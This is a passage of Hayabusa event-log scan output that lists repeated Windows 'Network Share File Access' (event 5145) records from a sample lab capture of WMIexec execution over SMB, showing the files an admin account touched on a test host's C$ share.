execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.130 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wbc80354b#\1dd94a4862b69a4583662583681346ca : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Downloads\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Favorites\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wc1cc6649#\c869d6724028906387ff9f65e11cd9a4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Links\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Music\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wca5f1176#\0e765b6e054c8bac98f30ced03330615 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Pictures\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Saved Games\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.145 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wcffedcb4#\37b337245bcc60a0f8c6cc814157fd9f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Searches\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Videos\desktop.ini : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd75d181a#\ff89d7fa29ebae7dfdd1cf2db43686dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wd518ee0d#\0658126a7d3bc7b0e7f548f2e3a423fb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.161 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We9f24001#\8505e29c9b52cf09d67343a0fc6f6260 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.We0722664#\4b78e11f2ba008b681ae84f8d5ffda55 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wed3937f9#\11adbe13e64f66d322e04cd718460b97 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wf493a5fb#\8b123051103ee49fa11dd81c04427182 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MIGUIControls\26985cb1bb8c065a2e50e5ac0791fbeb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.177 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCEx\ba21ae2888a2764f3d0df9ccd1e95506 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MMCFxCommon\e2ac72add0eac7c6264297f0a580e745 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 